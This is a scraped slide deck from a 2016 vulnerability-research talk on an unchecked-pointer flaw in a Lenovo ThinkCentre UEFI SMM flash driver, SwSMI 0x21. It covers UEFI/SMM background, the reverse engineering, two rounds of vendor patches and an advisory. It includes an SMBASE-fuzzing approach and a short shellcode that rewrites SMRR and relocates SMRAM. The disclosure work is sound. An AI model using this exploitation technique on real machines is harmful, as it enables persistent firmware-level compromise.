About unchecked management Conclusion Bruno Pujos July 16, 2016 - - PowerPoint PPT Presentation

about unchecked management
SMART_READER_LITE
LIVE PREVIEW

About unchecked management Conclusion Bruno Pujos July 16, 2016 - - PowerPoint PPT Presentation

Dec 27, 2023 567 likes •1.03k views

About unchecked management SMM & UEFI Vulnerability Patch About unchecked management Conclusion Bruno Pujos July 16, 2016 Bruno Pujos 1 / 45 Whoami About unchecked management SMM & UEFI Vulnerability Patch Conclusion Bruno

slide-1
SLIDE 1

About unchecked management SMM & UEFI Vulnerability Patch Conclusion Bruno Pujos 1/45

About unchecked management

Bruno Pujos July 16, 2016

slide-2
SLIDE 2

About unchecked management SMM & UEFI Vulnerability Patch Conclusion Bruno Pujos 2/45

Whoami

Bruno Pujos RE, vulnerability research LSE 2015 Sogeti since

slide-3
SLIDE 3

About unchecked management SMM & UEFI Vulnerability Patch Conclusion Bruno Pujos 3/45

About unchecked management

1

SMM & UEFI UEFI System Management Mode Protections Vulnerabilities

2

Vulnerability Reverse Exploitation

3

Patch

4

Conclusion

slide-4
SLIDE 4

About unchecked management SMM & UEFI

UEFI System Management Mode Protections Vulnerabilities

Vulnerability Patch Conclusion Bruno Pujos 4/45

Agenda

1

SMM & UEFI UEFI System Management Mode Protections Vulnerabilities

slide-5
SLIDE 5

About unchecked management SMM & UEFI

UEFI System Management Mode Protections Vulnerabilities

Vulnerability Patch Conclusion Bruno Pujos 5/45

Agenda

1

SMM & UEFI UEFI System Management Mode Protections Vulnerabilities

slide-6
SLIDE 6

About unchecked management SMM & UEFI

UEFI System Management Mode Protections Vulnerabilities

Vulnerability Patch Conclusion Bruno Pujos 6/45

UEFI

Unified Extended FIrmware UEFI is based on EFI Specification for firmware development Replacing the Basic Input/Output System (BIOS) Community effort organized through a forum

slide-7
SLIDE 7

About unchecked management SMM & UEFI

UEFI System Management Mode Protections Vulnerabilities

Vulnerability Patch Conclusion Bruno Pujos 7/45

Time line

CDP : Columbia Data Product; PCH: Platform Controller Hub; ICH: I/O Controller Hub

slide-8
SLIDE 8

About unchecked management SMM & UEFI

UEFI System Management Mode Protections Vulnerabilities

Vulnerability Patch Conclusion Bruno Pujos 8/45

UEFI specification stages

Security (SEC) Phase Pre-EFI Initialization (PEI) Phase Driver Execution Environment (DXE) Phase Boot Device Selection (BDS) Phase Runtime (RT) Phase Afterlife (AL) Phase

slide-9
SLIDE 9

About unchecked management SMM & UEFI

UEFI System Management Mode Protections Vulnerabilities

Vulnerability Patch Conclusion Bruno Pujos 9/45

Protocols

Drivers communicate using protocols Drivers can declare and requests protocols Protocols are defined by GUID They exposed tables containing function pointers, variables, . . .

slide-10
SLIDE 10

About unchecked management SMM & UEFI

UEFI System Management Mode Protections Vulnerabilities

Vulnerability Patch Conclusion Bruno Pujos 10/45

Agenda

1

SMM & UEFI UEFI System Management Mode Protections Vulnerabilities

slide-11
SLIDE 11

About unchecked management SMM & UEFI

UEFI System Management Mode Protections Vulnerabilities

Vulnerability Patch Conclusion Bruno Pujos 11/45

SMM

Not a ring -2 but an Intel mode Switch occurred when System Management Interrupt (SMI) Different address space (SMRAM) but located in physical memory Initialized by the firmware (UEFI) In charge to protect and modify the firmware Should be protected

slide-12
SLIDE 12

About unchecked management SMM & UEFI

UEFI System Management Mode Protections Vulnerabilities

Vulnerability Patch Conclusion Bruno Pujos 12/45

System Management Mode

Intel Modes Of Operation (Intel V.3 C.2 P.2)

slide-13
SLIDE 13

About unchecked management SMM & UEFI

UEFI System Management Mode Protections Vulnerabilities

Vulnerability Patch Conclusion Bruno Pujos 13/45

SMRAM

slide-14
SLIDE 14

About unchecked management SMM & UEFI

UEFI System Management Mode Protections Vulnerabilities

Vulnerability Patch Conclusion Bruno Pujos 14/45

SMM 101

Initialization

Can be before DXE Change SMBASE Add basic handler

SMI handler

SMI handlers are set mainly during the DXE phase SMI are often (only) triggered by the hardware SMI handlers are in long mode

slide-15
SLIDE 15

About unchecked management SMM & UEFI

UEFI System Management Mode Protections Vulnerabilities

Vulnerability Patch Conclusion Bruno Pujos 15/45

SMM 101

SWSMI

SWSMI are SMI using the IOPort 0xb2 (Advanced Power Management Control) Standard way to communicate with the UEFI Arguments are passed through the registers

mov dx, 0xB2 mov ax, SMINumber

  • ut dx, ax

SMBASE

SMBASE chosen by UEFI Must be known for exploitation

slide-16
SLIDE 16

About unchecked management SMM & UEFI

UEFI System Management Mode Protections Vulnerabilities

Vulnerability Patch Conclusion Bruno Pujos 16/45

Agenda

1

SMM & UEFI UEFI System Management Mode Protections Vulnerabilities

slide-17
SLIDE 17

About unchecked management SMM & UEFI

UEFI System Management Mode Protections Vulnerabilities

Vulnerability Patch Conclusion Bruno Pujos 17/45

Locking mechanism

Preventing corruption Root of trust: SPI Flash Specification say: if possible lock the flash Things to lock in reality:

SPI Flash SMRAM

slide-18
SLIDE 18

About unchecked management SMM & UEFI

UEFI System Management Mode Protections Vulnerabilities

Vulnerability Patch Conclusion Bruno Pujos 18/45

SPI Flash Protection

slide-19
SLIDE 19

About unchecked management SMM & UEFI

UEFI System Management Mode Protections Vulnerabilities

Vulnerability Patch Conclusion Bruno Pujos 19/45

SMRAM Protection

slide-20
SLIDE 20

About unchecked management SMM & UEFI

UEFI System Management Mode Protections Vulnerabilities

Vulnerability Patch Conclusion Bruno Pujos 20/45

Agenda

1

SMM & UEFI UEFI System Management Mode Protections Vulnerabilities

slide-21
SLIDE 21

About unchecked management SMM & UEFI

UEFI System Management Mode Protections Vulnerabilities

Vulnerability Patch Conclusion Bruno Pujos 21/45

Vulnerabilities

UEFI is ”huge” ( 300 ”drivers”) One fail and it is over Main kind of vulnerabilities: memory corruption Almost no memory protection (ASLR, NX. . . )

Kinds of vulnerability

”Hardware” Configuration Software

Possible targets

SMM UEFI

slide-22
SLIDE 22

About unchecked management SMM & UEFI

UEFI System Management Mode Protections Vulnerabilities

Vulnerability Patch Conclusion Bruno Pujos 22/45

SMM attacks

Only at runtime

Kernel type vulnerabilities

TOCTOU dereference outside of SMM NULL dereference . . .

”Hardware” type vulnerabilities

Cache poisoning DMA write . . .

slide-23
SLIDE 23

About unchecked management SMM & UEFI Vulnerability

Reverse Exploitation

Patch Conclusion Bruno Pujos 23/45

Agenda

2

Vulnerability Reverse Exploitation

slide-24
SLIDE 24

About unchecked management SMM & UEFI Vulnerability

Reverse Exploitation

Patch Conclusion Bruno Pujos 24/45

Agenda

2

Vulnerability Reverse Exploitation

slide-25
SLIDE 25

About unchecked management SMM & UEFI Vulnerability

Reverse Exploitation

Patch Conclusion Bruno Pujos 25/45

Target: the firmware

Dump the firmware from a ThinkCentre M92P (9SKT91A) Seems to use protocols from EDK (old Intel framework) Contain a lot of references to AMI Extracting the drivers (DXE & PEI)

slide-26
SLIDE 26

About unchecked management SMM & UEFI Vulnerability

Reverse Exploitation

Patch Conclusion Bruno Pujos 26/45

Target: the driver

Find a driver: SMIFlash.efi Looks interesting because Flash and SMM Lets Reverse it! Disclaimer: All functions and variables names are mine.

slide-27
SLIDE 27

About unchecked management SMM & UEFI Vulnerability

Reverse Exploitation

Patch Conclusion Bruno Pujos 27/45

SMIFlash.efi

Step

Initialization SWSMI handler

Initialization

smm_main function Several variables and protocols recuperation Register SwSMI 0x20 to 0x25 with SwSMIDispatchFunction

slide-28
SLIDE 28

About unchecked management SMM & UEFI Vulnerability

Reverse Exploitation

Patch Conclusion Bruno Pujos 28/45

SwSMIDispatchFunction

Some initialization before a switch by SwSMI Recuperate ECX and EBX from current context Combine both for a pointer on a structure (smiflash_arg) Structure is pass to some functions in the switch We will interest ourself only with the SwSMI 0x21

struct smiflash_arg { void *addr_buf; // 0x0 int32_t offset_bios; // 0x8 int32_t size; // 0xC char ret; // 0x10 };

slide-29
SLIDE 29

About unchecked management SMM & UEFI Vulnerability

Reverse Exploitation

Patch Conclusion Bruno Pujos 29/45

SwSMI handler 0x21

Simple SwSMI handler swsmi_handler21 Read from the SPI Flash (ReadFlash)and write the content into the buffer addr_buf is the destination

  • ffset_bios the reading offset

size the size to read ret a return value Basically a memcpy from SPI Flash to memory

struct smiflash_arg { void *addr_buf; // 0x0 int32_t offset_bios; // 0x8 int32_t size; // 0xC char ret; // 0x10 };

slide-30
SLIDE 30

About unchecked management SMM & UEFI Vulnerability

Reverse Exploitation

Patch Conclusion Bruno Pujos 30/45

Agenda

2

Vulnerability Reverse Exploitation

slide-31
SLIDE 31

About unchecked management SMM & UEFI Vulnerability

Reverse Exploitation

Patch Conclusion Bruno Pujos 31/45

Exploitation

Goal Code execution in SMM

Vulnerability

addr_buf, offset_bios and size are user-control There is no check on their value addr_buf is a physical address We can write in SMM where we want and whatever we want as long as it is in the Flash Not a real constraint: every possible byte is in the flash

Possibility

Write a shellcode Relocate the SMRAM

slide-32
SLIDE 32

About unchecked management SMM & UEFI Vulnerability

Reverse Exploitation

Patch Conclusion Bruno Pujos 32/45

SMBASE

SMBASE location

The SMBASE is needed for relocated the SMRAM SMBASE does not need to be aligned Always the same across reboot (for now) Several possibility:

RE the SMRAM initialization Guessing it Fuzzing it

Fuzzing SMBASE

Minimum: SMRR_BASE - 0x8000 Maximum: SMRR_TOP - 0x10000 Probably aligned Minimum step: 0x1000 Pretty efficient, but can crash a lot

slide-33
SLIDE 33

About unchecked management SMM & UEFI Vulnerability

Reverse Exploitation

Patch Conclusion Bruno Pujos 33/45

Exploitation

slide-34
SLIDE 34

About unchecked management SMM & UEFI Vulnerability

Reverse Exploitation

Patch Conclusion Bruno Pujos 34/45

Shellcode

mov ecx, 0x1F3 xor edx, edx xor eax, eax wrmsr mov eax, $realsmbase mov ebx, ($fakesmbase + 0xFEF8) mov [ebx], eax rsm

slide-35
SLIDE 35

About unchecked management SMM & UEFI Vulnerability Patch Conclusion Bruno Pujos 35/45

Agenda

3

Patch

slide-36
SLIDE 36

About unchecked management SMM & UEFI Vulnerability Patch Conclusion Bruno Pujos 36/45

Patch

We reported the vulnerability Some time later firmware got an update: 9SKT92A Of course I was interested on how they did it Let’s go reverse! Patch is in two part

slide-37
SLIDE 37

About unchecked management SMM & UEFI Vulnerability Patch Conclusion Bruno Pujos 37/45

Patch 9SKT92A: Initialization

smm_main recuperate new informations Recuperate the HOB list from the ConfigurationTable Search in the HOB list for a structure and copy it This structure contain the SMRAM_BASE and the SMRAM_SIZE

HOB: Hand-Off Block

slide-38
SLIDE 38

About unchecked management SMM & UEFI Vulnerability Patch Conclusion Bruno Pujos 38/45

Patch 9SKT92A: Check

Add a new isPointerOutSMRAM function Use SMRAM_BASE and SMRAM_SIZE It take a buffer (buf) and a size in parameter It is used for the first structure and in SwSMI handler 0x21, 0x22, 0x23. Check that buf is bellow SMRAM_BASE or above SMRAM_BASE + SMRAM_SIZE Same check for buf + size

slide-39
SLIDE 39

About unchecked management SMM & UEFI Vulnerability Patch Conclusion Bruno Pujos 39/45

Patch 9SKT92A: fail

In SwSMI 0x21 it is used on addr_buf We can put :

addr_buf < SMRAM_BASE addr_buf + size > SMRAM_BASE + SMRAM_SIZE

Fail we pass the check There is not even an overflow check. . .

slide-40
SLIDE 40

About unchecked management SMM & UEFI Vulnerability Patch Conclusion Bruno Pujos 40/45

Patch 9SKT92A: exploit ?

Really harder to exploit Potentially impossible in some firmware, but:

ReadFlash will potentially stop in the middle in some cases Rewrite the code: potential for a multi-cpu race The overflow can help us

It is necessary to have an exact layout of the SMRAM Exploit will probably depend on the firmware version :( But we report it. . .

slide-41
SLIDE 41

About unchecked management SMM & UEFI Vulnerability Patch Conclusion Bruno Pujos 41/45

Patch v2

Got an update: 9SKT95A And an advisory: LEN-4710 ! Modification in the isPointerOutSMRAM function:

Check for overflow Check that buf and buf + size are on the same side

  • f the SMRAM

There is even too much check. . .

slide-42
SLIDE 42

About unchecked management SMM & UEFI Vulnerability Patch Conclusion Bruno Pujos 42/45

Agenda

4

Conclusion

slide-43
SLIDE 43

About unchecked management SMM & UEFI Vulnerability Patch Conclusion Bruno Pujos 43/45

Can’t we make things better

Lot of way to fail with a design like that Not really anything standardized Just a buffer at a static physical address reserved by the BIOS will be a much better idea But retro-compatibility (especially in firmware)

slide-44
SLIDE 44

About unchecked management SMM & UEFI Vulnerability Patch Conclusion Bruno Pujos 44/45

Conclusion

Lenovo are not the only one to be impacted Only one to have published an advisory 10 constructors at least are impacted Probably several thousands computers

slide-45
SLIDE 45

About unchecked management SMM & UEFI Vulnerability Patch Conclusion Bruno Pujos 45/45

The End

Thank you for your attention. Questions ?